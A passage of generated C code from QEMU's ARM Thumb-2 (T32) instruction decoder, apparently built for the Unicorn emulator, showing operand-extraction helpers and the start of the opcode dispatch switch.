trans_UHADD16(DisasContext *ctx, arg_UHADD16 *a); typedef arg_rrr arg_SASX; static bool trans_SASX(DisasContext *ctx, arg_SASX *a); typedef arg_rrr arg_QASX; static bool trans_QASX(DisasContext *ctx, arg_QASX *a); typedef arg_rrr arg_SHASX; static bool trans_SHASX(DisasContext *ctx, arg_SHASX *a); typedef arg_rrr arg_UASX; static bool trans_UASX(DisasContext *ctx, arg_UASX *a); typedef arg_rrr arg_UQASX; static bool trans_UQASX(DisasContext *ctx, arg_UQASX *a); typedef arg_rrr arg_UHASX; static bool trans_UHASX(DisasContext *ctx, arg_UHASX *a); typedef arg_rrr arg_SSUB8; static bool trans_SSUB8(DisasContext *ctx, arg_SSUB8 *a); typedef arg_rrr arg_QSUB8; static bool trans_QSUB8(DisasContext *ctx, arg_QSUB8 *a); typedef arg_rrr arg_SHSUB8; static bool trans_SHSUB8(DisasContext *ctx, arg_SHSUB8 *a); typedef arg_rrr arg_USUB8; static bool trans_USUB8(DisasContext *ctx, arg_USUB8 *a); typedef arg_rrr arg_UQSUB8; static bool trans_UQSUB8(DisasContext *ctx, arg_UQSUB8 *a); typedef arg_rrr arg_UHSUB8; static bool trans_UHSUB8(DisasContext *ctx, arg_UHSUB8 *a); typedef arg_rrr arg_SSUB16; static bool trans_SSUB16(DisasContext *ctx, arg_SSUB16 *a); typedef arg_rrr arg_QSUB16; static bool trans_QSUB16(DisasContext *ctx, arg_QSUB16 *a); typedef arg_rrr arg_SHSUB16; static bool trans_SHSUB16(DisasContext *ctx, arg_SHSUB16 *a); typedef arg_rrr arg_USUB16; static bool trans_USUB16(DisasContext *ctx, arg_USUB16 *a); typedef arg_rrr arg_UQSUB16; static bool trans_UQSUB16(DisasContext *ctx, arg_UQSUB16 *a); typedef arg_rrr arg_UHSUB16; static bool trans_UHSUB16(DisasContext *ctx, arg_UHSUB16 *a); typedef arg_rrr arg_SSAX; static bool trans_SSAX(DisasContext *ctx, arg_SSAX *a); typedef arg_rrr arg_QSAX; static bool trans_QSAX(DisasContext *ctx, arg_QSAX *a); typedef arg_rrr arg_SHSAX; static bool trans_SHSAX(DisasContext *ctx, arg_SHSAX *a); typedef arg_rrr arg_USAX; static bool trans_USAX(DisasContext *ctx, arg_USAX *a); typedef arg_rrr arg_UQSAX; static bool trans_UQSAX(DisasContext *ctx, arg_UQSAX *a); typedef arg_rrr arg_UHSAX; static bool trans_UHSAX(DisasContext *ctx, arg_UHSAX *a); typedef arg_rrr_rot arg_SXTAH; static bool trans_SXTAH(DisasContext *ctx, arg_SXTAH *a); typedef arg_rrr_rot arg_UXTAH; static bool trans_UXTAH(DisasContext *ctx, arg_UXTAH *a); typedef arg_rrr_rot arg_SXTAB16; static bool trans_SXTAB16(DisasContext *ctx, arg_SXTAB16 *a); typedef arg_rrr_rot arg_UXTAB16; static bool trans_UXTAB16(DisasContext *ctx, arg_UXTAB16 *a); typedef arg_rrr_rot arg_SXTAB; static bool trans_SXTAB(DisasContext *ctx, arg_SXTAB *a); typedef arg_rrr_rot arg_UXTAB; static bool trans_UXTAB(DisasContext *ctx, arg_UXTAB *a); typedef arg_ldst_block arg_STM_t32; static bool trans_STM_t32(DisasContext *ctx, arg_STM_t32 *a); typedef arg_ldst_block arg_LDM_t32; static bool trans_LDM_t32(DisasContext *ctx, arg_LDM_t32 *a); typedef arg_rfe arg_RFE; static bool trans_RFE(DisasContext *ctx, arg_RFE *a); typedef arg_srs arg_SRS; static bool trans_SRS(DisasContext *ctx, arg_SRS *a); typedef arg_i arg_B; static bool trans_B(DisasContext *ctx, arg_B *a); typedef arg_i arg_BL; static bool trans_BL(DisasContext *ctx, arg_BL *a); typedef arg_i arg_BLX_i; static bool trans_BLX_i(DisasContext *ctx, arg_BLX_i *a); #ifdef CONFIG_PRAGMA_DIAGNOSTIC_AVAILABLE # pragma GCC diagnostic pop #endif static void disas_t32_extract_S_xri_rot(DisasContext *ctx, arg_s_rri_rot *a, uint32_t insn) { a->rn = extract32(insn, 16, 4); a->imm = t32_expandimm_imm(ctx, deposit32(deposit32(extract32(insn, 0, 8), 8, 24, extract32(insn, 12, 3)), 11, 21, extract32(insn, 26, 1))); a->rot = t32_expandimm_rot(ctx, deposit32(deposit32(extract32(insn, 0, 8), 8, 24, extract32(insn, 12, 3)), 11, 21, extract32(insn, 26, 1))); a->s = 1; a->rd = 0; } static void disas_t32_extract_S_xrr_shi(DisasContext *ctx, arg_s_rrr_shi *a, uint32_t insn) { a->rn = extract32(insn, 16, 4); a->shty = extract32(insn, 4, 2); a->rm = extract32(insn, 0, 4); a->shim = deposit32(extract32(insn, 6, 2), 2, 30, extract32(insn, 12, 3)); a->s = 1; a->rd = 0; } static void disas_t32_extract_bfi(DisasContext *ctx, arg_bfi *a, uint32_t insn) { a->rn = extract32(insn, 16, 4); a->rd = extract32(insn, 8, 4); a->msb = extract32(insn, 0, 5); a->lsb = deposit32(extract32(insn, 6, 2), 2, 30, extract32(insn, 12, 3)); } static void disas_t32_extract_bfx(DisasContext *ctx, arg_bfx *a, uint32_t insn) { a->rn = extract32(insn, 16, 4); a->rd = extract32(insn, 8, 4); a->widthm1 = extract32(insn, 0, 5); a->lsb = deposit32(extract32(insn, 6, 2), 2, 30, extract32(insn, 12, 3)); } static void disas_t32_extract_branch24(DisasContext *ctx, arg_i *a, uint32_t insn) { a->imm = t32_branch24(ctx, deposit32(deposit32(deposit32(deposit32(extract32(insn, 0, 11), 11, 21, extract32(insn, 16, 10)), 21, 11, extract32(insn, 11, 1)), 22, 10, extract32(insn, 13, 1)), 23, 9, sextract32(insn, 26, 1))); } static void disas_t32_extract_disas_t32_Fmt_10(DisasContext *ctx, arg_ri *a, uint32_t insn) { a->rd = extract32(insn, 8, 4); a->imm = negate(ctx, deposit32(deposit32(extract32(insn, 0, 8), 8, 24, extract32(insn, 12, 3)), 11, 21, extract32(insn, 26, 1))); } static void disas_t32_extract_disas_t32_Fmt_22(DisasContext *ctx, arg_empty *a, uint32_t insn) { } static void disas_t32_extract_disas_t32_Fmt_23(DisasContext *ctx, arg_cps *a, uint32_t insn) { a->imod = extract32(insn, 9, 2); a->M = extract32(insn, 8, 1); a->A = extract32(insn, 7, 1); a->I = extract32(insn, 6, 1); a->F = extract32(insn, 5, 1); a->mode = extract32(insn, 0, 5); } static void disas_t32_extract_disas_t32_Fmt_24(DisasContext *ctx, arg_mrs_bank *a, uint32_t insn) { a->r = extract32(insn, 20, 1); a->rd = extract32(insn, 8, 4); a->sysm = deposit32(extract32(insn, 16, 4), 4, 28, extract32(insn, 4, 1)); } static void disas_t32_extract_disas_t32_Fmt_25(DisasContext *ctx, arg_mrs_reg *a, uint32_t insn) { a->r = extract32(insn, 20, 1); a->rd = extract32(insn, 8, 4); } static void disas_t32_extract_disas_t32_Fmt_26(DisasContext *ctx, arg_disas_t3227 *a, uint32_t insn) { a->rd = extract32(insn, 8, 4); a->sysm = extract32(insn, 0, 8); } static void disas_t32_extract_disas_t32_Fmt_27(DisasContext *ctx, arg_msr_bank *a, uint32_t insn) { a->r = extract32(insn, 20, 1); a->rn = extract32(insn, 16, 4); a->sysm = deposit32(extract32(insn, 8, 4), 4, 28, extract32(insn, 4, 1)); } static void disas_t32_extract_disas_t32_Fmt_28(DisasContext *ctx, arg_msr_reg *a, uint32_t insn) { a->r = extract32(insn, 20, 1); a->rn = extract32(insn, 16, 4); a->mask = extract32(insn, 8, 4); } static void disas_t32_extract_disas_t32_Fmt_29(DisasContext *ctx, arg_disas_t3228 *a, uint32_t insn) { a->rn = extract32(insn, 16, 4); a->mask = extract32(insn, 10, 2); a->sysm = extract32(insn, 0, 8); } static void disas_t32_extract_disas_t32_Fmt_3(DisasContext *ctx, arg_pkh *a, uint32_t insn) { a->rn = extract32(insn, 16, 4); a->rd = extract32(insn, 8, 4); a->tb = extract32(insn, 5, 1); a->rm = extract32(insn, 0, 4); a->imm = deposit32(extract32(insn, 6, 2), 2, 30, extract32(insn, 12, 3)); } static void disas_t32_extract_disas_t32_Fmt_30(DisasContext *ctx, arg_r *a, uint32_t insn) { a->rm = extract32(insn, 16, 4); } static void disas_t32_extract_disas_t32_Fmt_31(DisasContext *ctx, arg_s_rri_rot *a, uint32_t insn) { a->imm = extract32(insn, 0, 8); a->rot = 0; a->s = 1; a->rd = 15; a->rn = 14; } static void disas_t32_extract_disas_t32_Fmt_32(DisasContext *ctx, arg_i *a, uint32_t insn) { a->imm = extract32(insn, 16, 4); } static void disas_t32_extract_disas_t32_Fmt_33(DisasContext *ctx, arg_i *a, uint32_t insn) { a->imm = deposit32(extract32(insn, 0, 12), 12, 20, extract32(insn, 16, 4)); } static void disas_t32_extract_disas_t32_Fmt_34(DisasContext *ctx, arg_ci *a, uint32_t insn) { a->cond = extract32(insn, 22, 4); a->imm = times_2(ctx, deposit32(deposit32(deposit32(deposit32(extract32(insn, 0, 11), 11, 21, extract32(insn, 16, 6)), 17, 15, extract32(insn, 13, 1)), 18, 14, extract32(insn, 11, 1)), 19, 13, sextract32(insn, 26, 1))); } static void disas_t32_extract_disas_t32_Fmt_4(DisasContext *ctx, arg_s_rrr_shr *a, uint32_t insn) { a->shty = extract32(insn, 21, 2); a->s = extract32(insn, 20, 1); a->rm = extract32(insn, 16, 4); a->rd = extract32(insn, 8, 4); a->rs = extract32(insn, 0, 4); a->rn = 0; } static void disas_t32_extract_disas_t32_Fmt_48(DisasContext *ctx, arg_disas_t3230 *a, uint32_t insn) { a->rn = extract32(insn, 16, 4); a->rd = extract32(insn, 8, 4); a->A = extract32(insn, 7, 1); a->T = extract32(insn, 6, 1); } static void disas_t32_extract_disas_t32_Fmt_9(DisasContext *ctx, arg_ri *a, uint32_t insn) { a->rd = extract32(insn, 8, 4); a->imm = deposit32(deposit32(extract32(insn, 0, 8), 8, 24, extract32(insn, 12, 3)), 11, 21, extract32(insn, 26, 1)); } static void disas_t32_extract_ldrex_0(DisasContext *ctx, arg_ldrex *a, uint32_t insn) { a->rn = extract32(insn, 16, 4); a->rt = extract32(insn, 12, 4); a->rt2 = 15; a->imm = 0; } static void disas_t32_extract_ldrex_d(DisasContext *ctx, arg_ldrex *a, uint32_t insn) { a->rn = extract32(insn, 16, 4); a->rt = extract32(insn, 12, 4); a->rt2 = extract32(insn, 8, 4); a->imm = 0; } static void disas_t32_extract_ldrex_i(DisasContext *ctx, arg_ldrex *a, uint32_t insn) { a->rn = extract32(insn, 16, 4); a->rt = extract32(insn, 12, 4); a->rt2 = 15; a->imm = times_4(ctx, extract32(insn, 0, 8)); } static void disas_t32_extract_ldst_ri_idx(DisasContext *ctx, arg_ldst_ri *a, uint32_t insn) { a->rn = extract32(insn, 16, 4); a->rt = extract32(insn, 12, 4); a->p = extract32(insn, 10, 1); a->u = extract32(insn, 9, 1); a->imm = extract32(insn, 0, 8); a->w = 1; } static void disas_t32_extract_ldst_ri_lit(DisasContext *ctx, arg_ldst_ri *a, uint32_t insn) { a->u = extract32(insn, 23, 1); a->rt = extract32(insn, 12, 4); a->imm = extract32(insn, 0, 12); a->p = 1; a->w = 0; a->rn = 15; } static void disas_t32_extract_ldst_ri_neg(DisasContext *ctx, arg_ldst_ri *a, uint32_t insn) { a->rn = extract32(insn, 16, 4); a->rt = extract32(insn, 12, 4); a->imm = extract32(insn, 0, 8); a->p = 1; a->w = 0; a->u = 0; } static void disas_t32_extract_ldst_ri_pos(DisasContext *ctx, arg_ldst_ri *a, uint32_t insn) { a->rn = extract32(insn, 16, 4); a->rt = extract32(insn, 12, 4); a->imm = extract32(insn, 0, 12); a->p = 1; a->w = 0; a->u = 1; } static void disas_t32_extract_ldst_ri_unp(DisasContext *ctx, arg_ldst_ri *a, uint32_t insn) { a->rn = extract32(insn, 16, 4); a->rt = extract32(insn, 12, 4); a->imm = extract32(insn, 0, 8); a->p = 1; a->w = 0; a->u = 1; } static void disas_t32_extract_ldst_rr(DisasContext *ctx, arg_ldst_rr *a, uint32_t insn) { a->rn = extract32(insn, 16, 4); a->rt = extract32(insn, 12, 4); a->shimm = extract32(insn, 4, 2); a->rm = extract32(insn, 0, 4); a->p = 1; a->w = 0; a->u = 1; a->shtype = 0; } static void disas_t32_extract_ldstd_ri8(DisasContext *ctx, arg_ldst_ri2 *a, uint32_t insn) { a->u = extract32(insn, 23, 1); a->rn = extract32(insn, 16, 4); a->rt = extract32(insn, 12, 4); a->rt2 = extract32(insn, 8, 4); a->imm = times_4(ctx, extract32(insn, 0, 8)); } static void disas_t32_extract_ldstm(DisasContext *ctx, arg_ldst_block *a, uint32_t insn) { a->w = extract32(insn, 21, 1); a->rn = extract32(insn, 16, 4); a->list = extract32(insn, 0, 16); a->u = 0; } static void disas_t32_extract_mov16(DisasContext *ctx, arg_ri *a, uint32_t insn) { a->rd = extract32(insn, 8, 4); a->imm = deposit32(deposit32(deposit32(extract32(insn, 0, 8), 8, 24, extract32(insn, 12, 3)), 11, 21, extract32(insn, 26, 1)), 12, 20, extract32(insn, 16, 4)); } static void disas_t32_extract_rdm(DisasContext *ctx, arg_rr *a, uint32_t insn) { a->rd = extract32(insn, 8, 4); a->rm = extract32(insn, 0, 4); } static void disas_t32_extract_rfe(DisasContext *ctx, arg_rfe *a, uint32_t insn) { a->w = extract32(insn, 21, 1); a->rn = extract32(insn, 16, 4); } static void disas_t32_extract_rn0dm(DisasContext *ctx, arg_rrrr *a, uint32_t insn) { a->rn = extract32(insn, 16, 4); a->rd = extract32(insn, 8, 4); a->rm = extract32(insn, 0, 4); a->ra = 0; } static void disas_t32_extract_rnadm(DisasContext *ctx, arg_rrrr *a, uint32_t insn) { a->rn = extract32(insn, 16, 4); a->ra = extract32(insn, 12, 4); a->rd = extract32(insn, 8, 4); a->rm = extract32(insn, 0, 4); } static void disas_t32_extract_rndm(DisasContext *ctx, arg_rrr *a, uint32_t insn) { a->rn = extract32(insn, 16, 4); a->rd = extract32(insn, 8, 4); a->rm = extract32(insn, 0, 4); } static void disas_t32_extract_rrr_rot(DisasContext *ctx, arg_rrr_rot *a, uint32_t insn) { a->rn = extract32(insn, 16, 4); a->rd = extract32(insn, 8, 4); a->rot = extract32(insn, 4, 2); a->rm = extract32(insn, 0, 4); } static void disas_t32_extract_s0_rn0dm(DisasContext *ctx, arg_s_rrrr *a, uint32_t insn) { a->rn = extract32(insn, 16, 4); a->rd = extract32(insn, 8, 4); a->rm = extract32(insn, 0, 4); a->ra = 0; a->s = 0; } static void disas_t32_extract_s0_rnadm(DisasContext *ctx, arg_s_rrrr *a, uint32_t insn) { a->rn = extract32(insn, 16, 4); a->ra = extract32(insn, 12, 4); a->rd = extract32(insn, 8, 4); a->rm = extract32(insn, 0, 4); a->s = 0; } static void disas_t32_extract_s0_rri_12(DisasContext *ctx, arg_s_rri_rot *a, uint32_t insn) { a->rn = extract32(insn, 16, 4); a->rd = extract32(insn, 8, 4); a->imm = deposit32(deposit32(extract32(insn, 0, 8), 8, 24, extract32(insn, 12, 3)), 11, 21, extract32(insn, 26, 1)); a->rot = 0; a->s = 0; } static void disas_t32_extract_s_rri_rot(DisasContext *ctx, arg_s_rri_rot *a, uint32_t insn) { a->s = extract32(insn, 20, 1); a->rn = extract32(insn, 16, 4); a->rd = extract32(insn, 8, 4); a->imm = t32_expandimm_imm(ctx, deposit32(deposit32(extract32(insn, 0, 8), 8, 24, extract32(insn, 12, 3)), 11, 21, extract32(insn, 26, 1))); a->rot = t32_expandimm_rot(ctx, deposit32(deposit32(extract32(insn, 0, 8), 8, 24, extract32(insn, 12, 3)), 11, 21, extract32(insn, 26, 1))); } static void disas_t32_extract_s_rrr_shi(DisasContext *ctx, arg_s_rrr_shi *a, uint32_t insn) { a->s = extract32(insn, 20, 1); a->rn = extract32(insn, 16, 4); a->rd = extract32(insn, 8, 4); a->shty = extract32(insn, 4, 2); a->rm = extract32(insn, 0, 4); a->shim = deposit32(extract32(insn, 6, 2), 2, 30, extract32(insn, 12, 3)); } static void disas_t32_extract_s_rxi_rot(DisasContext *ctx, arg_s_rri_rot *a, uint32_t insn) { a->s = extract32(insn, 20, 1); a->rd = extract32(insn, 8, 4); a->imm = t32_expandimm_imm(ctx, deposit32(deposit32(extract32(insn, 0, 8), 8, 24, extract32(insn, 12, 3)), 11, 21, extract32(insn, 26, 1))); a->rot = t32_expandimm_rot(ctx, deposit32(deposit32(extract32(insn, 0, 8), 8, 24, extract32(insn, 12, 3)), 11, 21, extract32(insn, 26, 1))); a->rn = 0; } static void disas_t32_extract_s_rxr_shi(DisasContext *ctx, arg_s_rrr_shi *a, uint32_t insn) { a->s = extract32(insn, 20, 1); a->rd = extract32(insn, 8, 4); a->shty = extract32(insn, 4, 2); a->rm = extract32(insn, 0, 4); a->shim = deposit32(extract32(insn, 6, 2), 2, 30, extract32(insn, 12, 3)); a->rn = 0; } static void disas_t32_extract_sat(DisasContext *ctx, arg_sat *a, uint32_t insn) { a->sh = extract32(insn, 21, 1); a->rn = extract32(insn, 16, 4); a->rd = extract32(insn, 8, 4); a->satimm = extract32(insn, 0, 5); a->imm = deposit32(extract32(insn, 6, 2), 2, 30, extract32(insn, 12, 3)); } static void disas_t32_extract_sat16(DisasContext *ctx, arg_sat *a, uint32_t insn) { a->rn = extract32(insn, 16, 4); a->rd = extract32(insn, 8, 4); a->satimm = extract32(insn, 0, 5); a->sh = 0; a->imm = 0; } static void disas_t32_extract_srs(DisasContext *ctx, arg_srs *a, uint32_t insn) { a->w = extract32(insn, 21, 1); a->mode = extract32(insn, 0, 5); } static void disas_t32_extract_strex_0(DisasContext *ctx, arg_strex *a, uint32_t insn) { a->rn = extract32(insn, 16, 4); a->rt = extract32(insn, 12, 4); a->rd = extract32(insn, 0, 4); a->rt2 = 15; a->imm = 0; } static void disas_t32_extract_strex_d(DisasContext *ctx, arg_strex *a, uint32_t insn) { a->rn = extract32(insn, 16, 4); a->rt = extract32(insn, 12, 4); a->rt2 = extract32(insn, 8, 4); a->rd = extract32(insn, 0, 4); a->imm = 0; } static void disas_t32_extract_strex_i(DisasContext *ctx, arg_strex *a, uint32_t insn) { a->rn = extract32(insn, 16, 4); a->rt = extract32(insn, 12, 4); a->rd = extract32(insn, 8, 4); a->rt2 = 15; a->imm = times_4(ctx, extract32(insn, 0, 8)); } static void disas_t32_extract_tbranch(DisasContext *ctx, arg_tbranch *a, uint32_t insn) { a->rn = extract32(insn, 16, 4); a->rm = extract32(insn, 0, 4); } static bool disas_t32(DisasContext *ctx, uint32_t insn) { union { arg_bfi f_bfi; arg_bfx f_bfx; arg_ci f_ci; arg_cps f_cps; arg_disas_t3227 f_disas_t3227; arg_disas_t3228 f_disas_t3228; arg_disas_t3230 f_disas_t3230; arg_empty f_empty; arg_i f_i; arg_ldrex f_ldrex; arg_ldst_block f_ldst_block; arg_ldst_ri f_ldst_ri; arg_ldst_ri2 f_ldst_ri2; arg_ldst_rr f_ldst_rr; arg_mrs_bank f_mrs_bank; arg_mrs_reg f_mrs_reg; arg_msr_bank f_msr_bank; arg_msr_reg f_msr_reg; arg_pkh f_pkh; arg_r f_r; arg_rfe f_rfe; arg_ri f_ri; arg_rr f_rr; arg_rrr f_rrr; arg_rrr_rot f_rrr_rot; arg_rrrr f_rrrr; arg_s_rri_rot f_s_rri_rot; arg_s_rrr_shi f_s_rrr_shi; arg_s_rrr_shr f_s_rrr_shr; arg_s_rrrr f_s_rrrr; arg_sat f_sat; arg_srs f_srs; arg_strex f_strex; arg_tbranch f_tbranch; } u; switch ((insn >> 27) & 0x1f) { case 0x1d: /* 11101... ........ ........ ........ */ switch (insn & 0x07400000) { case 0x00000000: /* 11101000 .0...... ........ ........ */ switch (insn & 0x00900000) { case 0x00000000: /* 11101000 00.0.... ........ ........ */ disas_t32_extract_srs(ctx, &u.f_srs, insn); switch ((insn >> 5) & 0x7fff) { case 0x6e00: /* 11101000 00.01101 11000000 000..... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:621 */ u.f_srs.pu = 2; if (trans_SRS(ctx, &u.f_srs)) return true; return false; } return false; case 0x00100000: /* 11101000 00.1.... ........ ........ */ disas_t32_extract_rfe(ctx, &u.f_rfe, insn); switch (insn & 0x0000ffff) { case 0x0000c000: /* 11101000 00.1.... 11000000 00000000 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:615 */ u.f_rfe.pu = 2; if (trans_RFE(ctx, &u.f_rfe)) return true; return false; } return false; case 0x00800000: /* 11101000 10.0.... ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:607 */ disas_t32_extract_ldstm(ctx, &u.f_ldst_block, insn); u.f_ldst_block.i = 1; u.f_ldst_block.b = 0; if (trans_STM_t32(ctx, &u.f_ldst_block)) return true; return false; case 0x00900000: /* 11101000 10.1.... ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:609 */ disas_t32_extract_ldstm(ctx, &u.f_ldst_block, insn); u.f_ldst_block.i = 1; u.f_ldst_block.b = 0; if (trans_LDM_t32(ctx, &u.f_ldst_block)) return true; return false; } return false; case 0x00400000: /* 11101000 .1...... ........ ........ */ switch ((insn >> 20) & 0x3) { case 0x0: /* 11101000 .100.... ........ ........ */ switch ((insn >> 23) & 0x1) { case 0x0: /* 11101000 0100.... ........ ........ */ if ((insn & 0x0000f03f) == 0x0000f000) { /* 11101000 0100.... 1111.... ..000000 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:512 */ disas_t32_extract_disas_t32_Fmt_48(ctx, &u.f_disas_t3230, insn); if (trans_TT(ctx, &u.f_disas_t3230)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:513 */ disas_t32_extract_strex_i(ctx, &u.f_strex, insn); if (trans_STREX(ctx, &u.f_strex)) return true; return false; case 0x1: /* 11101000 1100.... ........ ........ */ switch ((insn >> 4) & 0xf) { case 0x4: /* 11101000 1100.... ........ 0100.... */ disas_t32_extract_strex_0(ctx, &u.f_strex, insn); switch ((insn >> 8) & 0xf) { case 0xf: /* 11101000 1100.... ....1111 0100.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:515 */ if (trans_STREXB(ctx, &u.f_strex)) return true; return false; } return false; case 0x5: /* 11101000 1100.... ........ 0101.... */ disas_t32_extract_strex_0(ctx, &u.f_strex, insn); switch ((insn >> 8) & 0xf) { case 0xf: /* 11101000 1100.... ....1111 0101.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:516 */ if (trans_STREXH(ctx, &u.f_strex)) return true; return false; } return false; case 0x7: /* 11101000 1100.... ........ 0111.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:517 */ disas_t32_extract_strex_d(ctx, &u.f_strex, insn); if (trans_STREXD_t32(ctx, &u.f_strex)) return true; return false; case 0x8: /* 11101000 1100.... ........ 1000.... */ disas_t32_extract_ldrex_0(ctx, &u.f_ldrex, insn); switch (insn & 0x00000f0f) { case 0x00000f0f: /* 11101000 1100.... ....1111 10001111 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:525 */ if (trans_STLB(ctx, &u.f_ldrex)) return true; return false; } return false; case 0x9: /* 11101000 1100.... ........ 1001.... */ disas_t32_extract_ldrex_0(ctx, &u.f_ldrex, insn); switch (insn & 0x00000f0f) { case 0x00000f0f: /* 11101000 1100.... ....1111 10011111 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:526 */ if (trans_STLH(ctx, &u.f_ldrex)) return true; return false; } return false; case 0xa: /* 11101000 1100.... ........ 1010.... */ disas_t32_extract_ldrex_0(ctx, &u.f_ldrex, insn); switch (insn & 0x00000f0f) { case 0x00000f0f: /* 11101000 1100.... ....1111 10101111 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:524 */ if (trans_STL(ctx, &u.f_ldrex)) return true; return false; } return false; case 0xc: /* 11101000 1100.... ........ 1100.... */ disas_t32_extract_strex_0(ctx, &u.f_strex, insn); switch ((insn >> 8) & 0xf) { case 0xf: /* 11101000 1100.... ....1111 1100.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:520 */ if (trans_STLEXB(ctx, &u.f_strex)) return true; return false; } return false; case 0xd: /* 11101000 1100.... ........ 1101.... */ disas_t32_extract_strex_0(ctx, &u.f_strex, insn); switch ((insn >> 8) & 0xf) { case 0xf: /* 11101000 1100.... ....1111 1101.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:521 */ if (trans_STLEXH(ctx, &u.f_strex)) return true; return false; } return false; case 0xe: /* 11101000 1100.... ........ 1110.... */ disas_t32_extract_strex_0(ctx, &u.f_strex, insn); switch ((insn >> 8) & 0xf) { case 0xf: /* 11101000 1100.... ....1111 1110.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:519 */ if (trans_STLEX(ctx, &u.f_strex)) return true; return false; } return false; case 0xf: /* 11101000 1100.... ........ 1111.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:522 */ disas_t32_extract_strex_d(ctx, &u.f_strex, insn); if (trans_STLEXD_t32(ctx, &u.f_strex)) return true; return false; } return false; } return false; case 0x1: /* 11101000 .101.... ........ ........ */ switch ((insn >> 23) & 0x1) { case 0x0: /* 11101000 0101.... ........ ........ */ disas_t32_extract_ldrex_i(ctx, &u.f_ldrex, insn); switch ((insn >> 8) & 0xf) { case 0xf: /* 11101000 0101.... ....1111 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:528 */ if (trans_LDREX(ctx, &u.f_ldrex)) return true; return false; } return false; case 0x1: /* 11101000 1101.... ........ ........ */ switch ((insn >> 4) & 0xf) { case 0x0: /* 11101000 1101.... ........ 0000.... */ disas_t32_extract_tbranch(ctx, &u.f_tbranch, insn); switch ((insn >> 8) & 0xff) { case 0xf0: /* 11101000 1101.... 11110000 0000.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:545 */ if (trans_TBB(ctx, &u.f_tbranch)) return true; return false; } return false; case 0x1: /* 11101000 1101.... ........ 0001.... */ disas_t32_extract_tbranch(ctx, &u.f_tbranch, insn); switch ((insn >> 8) & 0xff) { case 0xf0: /* 11101000 1101.... 11110000 0001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:546 */ if (trans_TBH(ctx, &u.f_tbranch)) return true; return false; } return false; case 0x4: /* 11101000 1101.... ........ 0100.... */ disas_t32_extract_ldrex_0(ctx, &u.f_ldrex, insn); switch (insn & 0x00000f0f) { case 0x00000f0f: /* 11101000 1101.... ....1111 01001111 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:529 */ if (trans_LDREXB(ctx, &u.f_ldrex)) return true; return false; } return false; case 0x5: /* 11101000 1101.... ........ 0101.... */ disas_t32_extract_ldrex_0(ctx, &u.f_ldrex, insn); switch (insn & 0x00000f0f) { case 0x00000f0f: /* 11101000 1101.... ....1111 01011111 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:530 */ if (trans_LDREXH(ctx, &u.f_ldrex)) return true; return false; } return false; case 0x7: /* 11101000 1101.... ........ 0111.... */ disas_t32_extract_ldrex_d(ctx, &u.f_ldrex, insn); switch (insn & 0x0000000f) { case 0x0000000f: /* 11101000 1101.... ........ 01111111 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:531 */ if (trans_LDREXD_t32(ctx, &u.f_ldrex)) return true; return false; } return false; case 0x8: /* 11101000 1101.... ........ 1000.... */ disas_t32_extract_ldrex_0(ctx, &u.f_ldrex, insn); switch (insn & 0x00000f0f) { case 0x00000f0f: /* 11101000 1101.... ....1111 10001111 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:539 */ if (trans_LDAB(ctx, &u.f_ldrex)) return true; return false; } return false; case 0x9: /* 11101000 1101.... ........ 1001.... */ disas_t32_extract_ldrex_0(ctx, &u.f_ldrex, insn); switch (insn & 0x00000f0f) { case 0x00000f0f: /* 11101000 1101.... ....1111 10011111 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:540 */ if (trans_LDAH(ctx, &u.f_ldrex)) return true; return false; } return false; case 0xa: /* 11101000 1101.... ........ 1010.... */ disas_t32_extract_ldrex_0(ctx, &u.f_ldrex, insn); switch (insn & 0x00000f0f) { case 0x00000f0f: /* 11101000 1101.... ....1111 10101111 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:538 */ if (trans_LDA(ctx, &u.f_ldrex)) return true; return false; } return false; case 0xc: /* 11101000 1101.... ........ 1100.... */ disas_t32_extract_ldrex_0(ctx, &u.f_ldrex, insn); switch (insn & 